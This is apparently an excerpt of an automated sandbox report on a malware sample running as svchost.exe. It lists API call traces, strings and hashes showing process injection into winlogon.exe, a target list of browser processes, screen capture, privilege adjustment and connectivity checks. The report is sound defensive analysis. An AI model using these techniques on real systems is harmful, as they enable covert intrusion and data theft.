                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,02BD45D3,?,02C0D2A0,7556F380), ref: 02BB76BB
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB76C2
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB76DA
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,02BD45C4,00000104), ref: 02BB76E9
                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 02BB7711
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                • API String ID: 2617121151-1173974218
                                                                                                                                                                                                                • Opcode ID: 227555c9ae502ae4a938cb8a9b3fc3c83f47407aea69795b130b28b5342c85e1
                                                                                                                                                                                                                • Instruction ID: 83c46cee8782fb56e1a95ee93554f2ab6d0aad4819a3710e9553c264a884cc70
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 227555c9ae502ae4a938cb8a9b3fc3c83f47407aea69795b130b28b5342c85e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 566105729042455BCB228F359C98FF7BFA9EF85794F084694FA9287281EF61D409C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02BD56B7
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02BD4CFF
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02BD4D1E
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D3D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D53
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02BD4D5F
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D7A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D8A
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02BD4DC4
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02BD4DE5
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02BD4E11
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02BD4E29
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02BD4E44
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02BD4E52
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02BD4E7A
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4E8C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EA4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4EB5
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4ED6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EF2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4F03
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 2650560580-3024904723
                                                                                                                                                                                                                • Opcode ID: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                                • Instruction ID: 28172f90e5e0e640766d7087b7683017d09902a65e3f7253698369a4a91b92d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED617075640305BBEB64DF64CC88FEA7BB8EF84744F548459FA059B280E7B4EA41CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02BD54B0
                                                                                                                                                                                                                • GetWindowDC.USER32(00000000), ref: 02BD54B7
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 02BD54C8
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 02BD54E1
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BD54E9
                                                                                                                                                                                                                • CreateDIBSection.GDI32(00000000,?,00000001,?,00000000,00000000), ref: 02BD5522
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 02BD552C
                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 02BD5549
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02BD554F
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BD5559
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001020), ref: 02BD556F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BD5576
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD558A
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02BD55A5
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: RtlFreeHeap.NTDLL(00000000), ref: 02BC41D1
                                                                                                                                                                                                                • GetDIBits.GDI32(02BCFDFB,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD55F4
                                                                                                                                                                                                                • ReleaseDC.USER32(?,02BCFDFB), ref: 02BD566C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Window$BitsCapsCreateDesktopDevicememset$AllocAllocateCompatibleFreeObjectReleaseSectionSelectValidate
                                                                                                                                                                                                                • String ID: ($BM
                                                                                                                                                                                                                • API String ID: 3203594236-2980357723
                                                                                                                                                                                                                • Opcode ID: 736d35adc55be928bc74a0b105f8a69d98fc3f2c9d385d25eb5be619c00e2c02
                                                                                                                                                                                                                • Instruction ID: 6d75488d0c9ad639daa8b2a7b8a0c34c38ebcfbf3f33a37ee59a5191c2e94c15
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 736d35adc55be928bc74a0b105f8a69d98fc3f2c9d385d25eb5be619c00e2c02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B5181B2D40214AFDB609FA4DC48BAEBBB9EF48750F504559FA05FB240DBB499008BA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75572F00), ref: 02BD9991
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,?), ref: 02BD9B0D
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 02BD9B1C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                                • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                                • API String ID: 2477558990-1591360731
                                                                                                                                                                                                                • Opcode ID: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                                • Instruction ID: b461757818bfddfe25a2474a52112285c5a7b3e154ad9055e720712d42659565
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F551B5B1604741AFD320DF54C888FEBBBE9FB85704F044A8DFA9597244E7749948CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                                • DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75570F10), ref: 02BC4FE7
                                                                                                                                                                                                                • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75570F10), ref: 02BC5045
                                                                                                                                                                                                                • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                                • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                                • API String ID: 1656757314-3977723178
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB7FF1
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BB8002
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB8010
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB8019
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BB802F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB8041
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB8069
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BB8082
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 02BB808D
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000), ref: 02BB8099
                                                                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 02BB80A4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                                • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$P0Wu$\explorer.exe
                                                                                                                                                                                                                • API String ID: 2248524772-1625487603
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02BC78B4
                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,75570F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02BC7912
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                                • API String ID: 838372802-4199822264
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02BB79FC
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02BB7A0F
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,75570F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BB7A1E
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BB7A37
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BB7A3E
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BB7A54
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7A99
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB7AB3
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02BB7AC6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                                • String ID: 9e93884aa$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                                • API String ID: 1400009243-2197521726
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                • API String ID: 731831024-2333288578
                                                                                                                                                                                                                APIs
